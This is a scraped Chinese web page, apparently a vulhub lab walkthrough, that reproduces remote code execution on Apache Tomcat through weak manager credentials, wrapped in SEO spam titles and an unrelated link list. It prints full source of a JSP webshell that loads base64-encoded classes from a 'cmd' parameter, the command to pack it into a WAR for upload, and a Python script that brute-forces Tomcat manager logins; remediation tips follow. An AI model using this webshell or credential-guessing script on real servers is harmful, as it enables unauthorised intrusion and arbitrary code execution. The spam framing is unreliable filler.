当前位置: 首页 > news >正文

男女做那个是的视频网站百度推广点击收费标准

男女做那个是的视频网站,百度推广点击收费标准,哪里有做桥梁模型的网站,做网站的公司主要工作1 漏洞背景 Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR…

1 漏洞背景

Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码

2 启动vulhub靶场

进入目录cd vulhub/tomcat/tomcat8
启动漏洞环境
docker compose up -d
查看端口
docker-ompose ps

访问 ,您将看到页面,表示环境正在成功运行。

3 漏洞复现步骤

点击Manager App即可跳到管理登陆页面

输入用户名密码 tomcat:tomcat,来到管理界面

登录到后台后可以通过部署war包进行getshell

找一个a.jsp木马

<%-- 使用时请删除此行, 连接密码: cmd --%>
<%!
class NATURAL extends ClassLoader{NATURAL(ClassLoader c){super(c);}public Class proper(byte[] b){return super.defineClass(b, 0, b.length);}
}
public byte[] tuple(String str) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("sun.misc.BASE64Decoder");Object decoder = base64.newInstance();value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });} catch (Exception e) {try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });} catch (Exception ee) {}}return value;
}
%>
<%
String cls = request.getParameter("cmd");
if (cls != null) {new NATURAL(this.getClass().getClassLoader()).proper(tuple(cls)).newInstance().equals(new Object[]{request,response});
}
%>
​

打包成war

jar cvf tomcat.war a.jsp

上传打包的tomcat.war

生成一个tomcat的路径

在地址栏路径中访问http://192.168.1.20:8080/tomcat/a.jsp

蚁剑连接,密码cmd

4 修复方案

  1. 修改默认密码:确保Tomcat的管理后台使用了强密码,并定期更换密码。

  2. 限制访问权限:限制对Tomcat管理后台的访问权限,只允许可信的IP地址或网络段进行访问。

  3. 禁用不必要的模块:禁用Tomcat中不必要的模块和功能,减少潜在的安全风险。

  4. 定期更新和打补丁:定期更新Tomcat服务器和相关的Java环境,及时修复已知的安全漏洞。

  5. 使用Web应用防火墙(WAF):在Tomcat服务器前部署Web应用防火墙(WAF),对传入的请求进行过滤和检测,防止恶意请求的执行。

5 使用python脚本探测漏洞

弱口令脚本

#!/usr/bin/env python  import requests  
import base64  def tomcat_weak_password():  """  检查 Tomcat 服务器是否存在弱密码。  """  # 输入目标 IP 地址(注意:这里应该是一个完整的 URL,如 http://192.168.1.1:8080/manager/)  url = input("请输入目标IP地址(包含端口和路径,如 http://IP:PORT/manager/): ")  # 常见的用户名列表  users = ['tomcat','admin','system','Administrator','root','123','tomcat']  # 常见的密码列表  passwords = ['12345','123','tomcat','admin','00000','tomcat']  # 遍历用户名和密码列表  for user in users:  for password in passwords:  # 拼接用户名和密码,并转换为 base64 编码  tomcat_passwd = user.strip() + ':' + password.strip()  encoded_password = base64.b64encode(tomcat_passwd.encode('utf-8'))  # 将 base64 编码的密码转换为字符串,并添加 'Basic ' 前缀  encoded_password_end = 'Basic ' + str(encoded_password, 'utf-8')  # 构造请求头  headers = {  'Content-Type': 'application/x-www',  # 注意:这里的内容类型可能不正确,Tomcat 管理页面可能不需要这个  'Authorization': encoded_password_end,  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36'  }  # 发送 GET 请求  response = requests.get(url, headers=headers)  # 如果返回状态码为 200,则认为存在弱口令  if response.status_code == 200:  print('存在弱口令')  print('账号', user)  print('密码', password)  # 当找到一个弱密码后,立即退出循环  break  # 调用函数  
tomcat_weak_password()

结果

http://www.fp688.cn/news/165040.html

相关文章:

  • cms网站内容管理系统seo广州工作好吗
  • 做网站费用是什么外链网站是什么
  • 天津网站建设工作室巨量引擎广告投放平台代理
  • 十堰网站搜索优化价格成都网站推广经理
  • 那个旅游网站做攻略最好搜索引擎优化的缺点包括
  • 网站搜索排名优化价格网络营销案例分享
  • wordpress 网站生成app百度指数怎么看
  • 网站上哪个做相片书好搜索数据
  • pc端网站转手机站怎么做宁波谷歌seo推广公司
  • 我想找个郑州做网站的网页关键词优化软件
  • 我想做个网站要多少钱网络运营
  • 网络行为管理系统徐州seo排名公司
  • 用织梦做的网站好还是cms网络营销ppt案例
  • 网络营销型网站建设的内容汕头网站建设方案开发
  • php做网站需要什么技术百度seo优化包含哪几项
  • 废旧电脑做网站服务器谷歌广告联盟
  • 物业网站建设武汉网站设计公司
  • 网站建设需要实现哪些目标优化seo公司哪家好
  • 佛山网站搭建公司网络推广关键词优化公司
  • 怎么搭建自己的网站卖货企业网络营销推广方法
  • 网站开发类毕业论文范例株洲seo
  • 网站在布局专业黑帽seo
  • 滨湖网站制作点点站长工具
  • 昭通市有做网站的吗排名优化seo公司
  • b2c网站结构分析安卓aso优化
  • 河北网站建设公司排名地推
  • 山东住房和城乡建设部网站首页石家庄整站优化技术
  • 科技开发公司长沙seo外包
  • 太原市建设局网站页面seo是什么意思
  • 男子替人做赌博网站百度帐号申请注册